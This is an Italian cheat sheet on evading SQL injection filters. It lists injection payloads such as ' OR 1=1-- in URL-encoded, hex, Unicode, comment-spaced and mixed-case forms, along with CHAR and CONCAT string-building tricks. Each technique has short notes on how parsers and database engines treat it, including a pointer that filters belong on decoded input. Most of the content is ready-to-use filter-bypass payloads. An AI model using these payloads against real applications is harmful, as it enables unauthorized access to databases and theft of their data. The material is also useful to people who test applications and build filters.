tags : SQL_Evasion


URL Encoding

La decodifica percentuale viene eseguita dal server web o applicativo: un filtro che esamina l'input prima della decodifica non riconosce il payload, quindi i controlli vanno applicati sul valore già decodificato e normalizzato.

 
' OR 1=1--
 
# Diventa
 
%27%20OR%201%3D1--
 

Hexadecimal Encoding

Il confronto con un letterale esadecimale (0x...) dipende dal motore: in MySQL viene interpretato come stringa binaria, in altri motori può risultare un tipo diverso o un errore di sintassi.

 
SELECT * FROM users WHERE name = 'admin'
 
# Diventa
 
SELECT * FROM users WHERE name = 0x61646d696e
 

Unicode Encoding

Le sequenze \uXXXX sono in genere decodificate dal livello applicativo (ad esempio da un parser JSON) prima che la query venga composta, non dal motore SQL, salvo sintassi di escape specifiche del motore; un filtro applicato prima di questa decodifica non le riconosce.

 
admin
 
# Diventa
 
\u0061\u0064\u006d\u0069\u006e
 

No Spaces Allowed

 
SELECT * FROM users WHERE name = 'admin'
 
# Diventa
 
SELECT/**/*FROM/**/users/**/WHERE/**/name/**/='admin'
 
1' OR 1=1 --
 
# Diventa
 
1'%0A||%0A1=1%0A--%27+
 

Altri caratteri di spaziatura (in forma URL-encoded) che possono sostituire lo spazio sono %09 (tab), %0A (LF), %0C (FF), %0D (CR) e %A0.

Payload misti

Nota: spezzare una parola chiave con un commento inline (es. SE/**/LECT) non è accettato da tutti i motori, perché in molti di essi il commento vale come separatore; la sintassi effettivamente accettata dipende dal parser del database e va verificata caso per caso.

 
SElEcT * FrOm users or SE/**/LECT * FROM/**/users
 
SELECT%0A*%0AFROM%0Ausers or SELECT/**/*/**/FROM/**/users
 
username = 'admin' && password = 'password' or username = 'admin'/**/||/**/1=1 --
 
SElEcT * FROM users WHERE username = CHAR(0x61,0x64,0x6D,0x69,0x6E)
 
SElECT * FROM users WHERE username = CONCAT('a','d','m','i','n') or SElEcT/**/username/**/FROM/**/users